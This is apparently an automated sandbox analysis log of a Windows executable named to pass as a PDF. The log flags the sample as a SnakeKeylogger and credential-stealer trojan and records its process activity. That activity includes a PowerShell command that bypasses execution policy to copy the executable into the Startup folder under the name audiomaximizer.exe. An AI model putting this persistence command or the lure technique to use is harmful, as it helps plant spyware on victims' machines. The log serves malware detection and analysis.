            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000037E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Web.dllT vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4127824608.00000000014F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exeBinary or memory string: OriginalFilenameFisa.exe* vs PDF-3093900299039 pdf.exe
            Source: PDF-3093900299039 pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.PDF-3093900299039 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.PDF-3093900299039 pdf.exe.51c0000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.PDF-3093900299039 pdf.exe.51c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.audiomaximizer.exe.333b070.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.audiomaximizer.exe.3338830.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.PDF-3093900299039 pdf.exe.2a98348.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.PDF-3093900299039 pdf.exe.2a9ab88.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@3/4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfdjqddg.a1u.ps1Jump to behavior
            Source: PDF-3093900299039 pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PDF-3093900299039 pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PDF-3093900299039 pdf.exeVirustotal: Detection: 63%
            Source: PDF-3093900299039 pdf.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeFile read: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess created: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess created: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeSection loaded: wintypes.dllJump to behavior
